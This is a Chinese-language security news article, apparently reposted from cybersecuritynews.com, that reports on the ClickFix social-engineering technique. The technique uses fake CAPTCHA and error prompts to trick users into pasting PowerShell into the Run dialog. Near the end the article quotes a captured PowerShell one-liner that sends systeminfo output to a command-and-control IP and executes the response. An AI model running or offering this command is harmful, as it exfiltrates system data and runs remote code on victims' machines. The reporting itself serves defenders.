更多全球网络安全资讯尽在邑安全
网络安全研究人员发现了一种新型高级社会工程攻击活动,该攻击利用人们对日常计算机操作的基本信任心理。自2024年3月以来活跃的ClickFix技术,代表了网络犯罪战术的危险演变——通过攻击网络中最脆弱的环节(终端用户)来绕过传统安全措施。
这种欺骗性手法伪装成常规错误消息、CAPTCHA验证提示或系统维护通知,诱骗受害者在自己的系统上执行恶意代码。
攻击活动概况
该技术已在网络犯罪生态系统中迅速蔓延,吸引了从个体黑客到高级持续威胁(APT)组织的广泛关注,包括与俄罗斯和伊朗国家利益相关的APT28和MuddyWater组织。ClickFix攻击活动已成功入侵医疗保健、酒店、汽车制造和政府机构等多个行业,证明了这种以人为中心的攻击媒介具有普遍适用性。
Darktrace分析师在欧洲、中东、非洲和美国客户环境中均发现了ClickFix攻击案例,揭示了这一新兴威胁的全球性影响。调查显示,攻击者采用系统化攻击方式,利用鱼叉式钓鱼邮件、路过式下载(drive-by)攻击以及GitHub等可信平台的漏洞来投递恶意负载。
攻击手法剖析
攻击通常始于隐藏在电子邮件或被入侵合法网站恶意广告中的链接,这些链接会将毫无戒心的用户重定向到伪装成合法系统提示的恶意URL。ClickFix攻击利用用户解决表面技术问题的自然倾向进行心理操控。
受害者会遇到看似真实的虚假CAPTCHA提示或"修复"对话框,声称要解决网页显示错误或设备注册要求等虚构问题。一旦用户上钩,就会被引导完成看似标准的三步验证流程,最终导致系统执行恶意的PowerShell命令。
攻击影响范围
这些攻击造成的财务和运营影响远超初始系统入侵。在成功获得初始访问权限后,攻击者会在目标环境中建立命令控制(C2)通信通道,实现在网络中的横向移动,主要目的是获取并外泄敏感组织数据。攻击活动中经常部署与XWorm、Lumma和AsyncRAT等多个恶意软件家族相关的恶意负载。
感染机制技术分析
ClickFix攻击的技术复杂性不在于复杂的恶意软件开发,而在于社会工程与合法系统功能的无缝结合。攻击链始于受害者遇到精心设计的提示,指示他们按下Windows键+R打开运行对话框,然后按CTRL+V粘贴预加载的恶意PowerShell命令,最后按Enter键执行负载。
Darktrace对2025年4月9日一起特定攻击的调查揭示了该过程的技术细节。入侵行为启动了与命令控制基础设施的外部通信,触发了新的PowerShell用户代理检测,表明存在远程代码执行尝试。
恶意PowerShell命令包含复杂的混淆技术和基于时间戳的文件命名约定。对攻击期间捕获的网络流量分析显示,通过数据包捕获检查可以了解PowerShell脚本的功能。该命令将当前时间转换为Unix时间戳格式,创建看似无害数字字符串的动态命名文件。
例如,攻击生成名为"1744205184"的文件(对应执行时间戳),随后创建包含系统侦察数据的二级文件"1744205200"。
`$s=[int64](((datetime)::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffff0; $b="193.36.38.237"; $c='IRM'; $d='POST'; $e='Invoke-Expression'; $f=$(systeminfo|out-string); &($c) "$b`:8080/$s" -Method $d -Body $f -ContentType 'application/octet-stream'|&($e)`
这段PowerShell代码展示了攻击方法:先设置目标IP地址、HTTP方法和系统信息收集变量,然后将完整的设备详细信息传输到位于193.36.38.237的命令控制服务器。外泄数据包括完整的系统规格、网络配置、安全功能和硬件细节,为攻击者规划后续攻击阶段提供了广泛情报。
原文来自: cybersecuritynews.com
原文链接: https://cybersecuritynews.com/hackers-using-new-clickfix-technique/
原文始发于微信公众号(邑安全):攻击者利用新型ClickFix技术,诱导用户执行恶意代码
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论